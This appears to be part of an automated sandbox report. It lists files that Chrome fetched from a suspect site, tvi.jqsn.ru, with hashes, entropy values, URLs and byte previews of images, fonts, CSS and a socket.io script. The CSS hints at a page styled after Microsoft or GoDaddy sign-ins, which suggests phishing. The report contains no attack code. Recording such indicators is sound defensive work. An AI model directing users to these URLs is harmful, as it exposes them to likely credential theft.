                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1400
                                                                                                                          Entropy (8bit):7.808470583085035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                                                                                          MD5:333EE830E5AB72C41DD9126A27B4D878
                                                                                                                          SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                                                                                          SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                                                                                          SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/klIFbovzrx4Bgm9HP1kkwKZ366ARsqrpKJvowfKfzOTHW4ruU2fyvab228
                                                                                                                          Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):76
                                                                                                                          Entropy (8bit):4.631455882779888
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:xPW1skF0NuiQMnumOPIOAyP2MR:xPWmJumOPzAo2C
                                                                                                                          MD5:55D6D0CAE462E2BC690BC8AF45985B15
                                                                                                                          SHA1:0AD644096680FB01BFD9AF1CFE5F6E68911EA01F
                                                                                                                          SHA-256:2E5AE61757DB10E0E3770407B68ADE329068C840070A02F119C9EBE296194043
                                                                                                                          SHA-512:A929EE066B9150F1DC864A38FC1BF7D1F69B560CF6C123C0709EC983581B0B5F37360B3F318CA78EC9A3755C592A2928FA882CB34F160381ADA5A148B0786BCA
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISMwlIfSmP-mohmhIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                                                                                                          Preview:CjYKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 100 x 7, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):4.068159130770306
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPlp4ttG/1xl/k4E08up:6v/lhPMttGt7Tp
                                                                                                                          MD5:B7512D2BF79AE2A0FD81D42D70FB7556
                                                                                                                          SHA1:1363B936F114F69F13783F9EADB158DA7D9F59A2
                                                                                                                          SHA-256:32F9C06FF63C2191CE922AFE88DD3F7397A9DC49A4779B42C13167BEE760CDEF
                                                                                                                          SHA-512:1FF15C13B478371DA263D8D5EA667FEF8D66E0FF0771EB19EF184DEDB6B9749A40799383490D84398C428FAEC80C642212EA7C759E5881631F5D130F0413E30A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/875854595e7f53f2/1713314068893/8waoYsE4nxAn5eo
                                                                                                                          Preview:.PNG........IHDR...d.........q.......IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):727
                                                                                                                          Entropy (8bit):7.573165690842521
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/70lGN4n6OF/Y9jJ6xmOLY3cyWiJBYmH7xCZm1Uvleq8AM8Tkbc0:HudJ6xU3fWU1HsZm1Wleq8t5b/
                                                                                                                          MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                                                                                                          SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                                                                                                          SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                                                                                                          SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/qr6ucATmqV0pZCT5vGBmnHQQ5qeSshM667135
                                                                                                                          Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):43596
                                                                                                                          Entropy (8bit):7.9952701440723475
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:b0nfc/3Osy1fo0tBBFF/GGXfN2ZHKTBUwL+BR49qCow3Z3HuvJ5+xXtTgXHk6/:b0fU3OdhFF/xNOoZc49ow3Z3HO+xX1mf
                                                                                                                          MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                                                                                                          SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                                                                                                          SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                                                                                                          SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/89T0AFtET47Mtjcd1jdhpDg4Knmkab73
                                                                                                                          Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (23398), with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):23398
                                                                                                                          Entropy (8bit):5.104409455331282
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:ztafGtz2omXX44PL5Ky0sdY8xbXnb4YEb0tkBSgfn:hafSz2omXX44PL5Ky0sdY8xbXnEYw0sz
                                                                                                                          MD5:C1C51D30D5E7094136F2D828349E520F
                                                                                                                          SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                                                                                          SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                                                                                          SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/56A5wX26vkiBXPzcdL7A5K8920
                                                                                                                          Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):2905
                                                                                                                          Entropy (8bit):3.962263100945339
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                                                          MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                          SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                          SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                          SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/wx3DGb43mykL3VQGKZs4rsXyO8wG7fTCt1TRnhO0Dn3uab176
                                                                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):93276
                                                                                                                          Entropy (8bit):7.997636438159837
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                                                                                          MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                          SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                          SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                          SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/cdMVTgR3ifU0J478w5vPGB5lhjWmn93
                                                                                                                          Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 100 x 7, 8-bit/color RGB, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):61
                                                                                                                          Entropy (8bit):4.068159130770306
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:yionv//thPlp4ttG/1xl/k4E08up:6v/lhPMttGt7Tp
                                                                                                                          MD5:B7512D2BF79AE2A0FD81D42D70FB7556
                                                                                                                          SHA1:1363B936F114F69F13783F9EADB158DA7D9F59A2
                                                                                                                          SHA-256:32F9C06FF63C2191CE922AFE88DD3F7397A9DC49A4779B42C13167BEE760CDEF
                                                                                                                          SHA-512:1FF15C13B478371DA263D8D5EA667FEF8D66E0FF0771EB19EF184DEDB6B9749A40799383490D84398C428FAEC80C642212EA7C759E5881631F5D130F0413E30A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...d.........q.......IDAT.....$.....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):28584
                                                                                                                          Entropy (8bit):7.992563951996154
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:768:8n53CNftp4NM/2qxGvtAG9fvpWYSTvlj6OIqrd1xUseRc:85SNfQS2ntfxvpWYSTcfMERc
                                                                                                                          MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                          SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                          SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                          SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/56VQuccXKefp045CypTXYc2st60
                                                                                                                          Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1400
                                                                                                                          Entropy (8bit):7.808470583085035
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                                                                                          MD5:333EE830E5AB72C41DD9126A27B4D878
                                                                                                                          SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                                                                                          SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                                                                                          SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):29796
                                                                                                                          Entropy (8bit):7.980058333789969
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:uEV6Q9wDBC1MNazNsMYCUPwRGMSU6Ub1W:uKpiOZ7YCpRRXk
                                                                                                                          MD5:210433A8774859368F3A7B86D125A2A7
                                                                                                                          SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                                                                                                          SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                                                                                                          SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://tvi.jqsn.ru/qrroFnG3M60J3FhNqOM0FGt8JF3y5912lJkLOor1EsoLL8YoDCMTx8tUgChmhe8gngUwuef236
                                                                                                                          Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):231
                                                                                                                          Entropy (8bit):6.725074433303473
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                                                                                          MD5:547988BAC5584B4608466D761E16F370
                                                                                                                          SHA1:C11BB71049702528402A31027F200184910A7E23
                                                                                                                          SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                                                                                          SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (45667)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):45806
                                                                                                                          Entropy (8bit):5.207605835316031
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:1ZS0CCnasl8gRR/PoPez+iCMN0Fkiw2Jh4RWdRGhAjbp2ChPL8cYRGv5MRUK6np9:/CCnVl7tUkBxkdRGOfDiY5C5MAn5GY2
                                                                                                                          MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                                                                                                          SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                                                                                                          SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                                                                                                          SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://cdn.socket.io/4.6.0/socket.io.min.js
